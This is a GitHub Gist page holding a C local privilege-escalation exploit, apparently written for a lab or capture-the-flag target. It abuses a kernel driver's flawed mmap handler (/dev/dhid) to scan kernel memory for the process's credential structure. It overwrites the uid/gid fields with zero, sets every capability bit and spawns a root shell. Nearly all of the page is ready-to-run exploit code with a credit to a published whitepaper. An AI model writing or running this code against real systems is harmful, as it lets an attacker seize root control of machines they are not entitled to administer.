-
-
Save xct/89a4b37c2a0bd4bd2425c9f6749f170f to your computer and use it in GitHub Desktop.
MMAP Kernel Module Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // based on https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-mmap-exploitation-whitepaper-2017-09-18.pdf | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <errno.h> | |
| #include <assert.h> | |
| int main(int argc, char * const * argv) | |
| { | |
| int fd = open("/dev/dhid", O_RDWR); | |
| unsigned long size = 0xf0000000; | |
| unsigned long mmapStart = 0x42424000; | |
| unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0); | |
| unsigned int uid = getuid(); | |
| unsigned int credIt = 0; | |
| unsigned int credNum = 0; | |
| while (((unsigned long)addr) < (mmapStart + size - 0x500)){ | |
| credIt = 0; | |
| if (addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid){ | |
| credNum++; | |
| printf("[+] Found cred structure! ptr: %p, credNum: %d\n", addr, | |
| credNum); | |
| credIt = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| addr[credIt++] = 0; | |
| if (getuid() == 0){ | |
| puts("[+] Root!"); | |
| credIt += 1; //Skip 4 bytes, to get capabilities | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| addr[credIt++] = 0xffffffff; | |
| execl("/bin/sh", "-", (char *)NULL); | |
| puts("[-] Execl failed..."); | |
| break; | |
| } else { | |
| credIt = 0; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| addr[credIt++] = uid; | |
| } | |
| } | |
| addr++; | |
| } | |
| puts("[+] Done"); | |
| fflush(stdout); | |
| int stop = getchar(); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment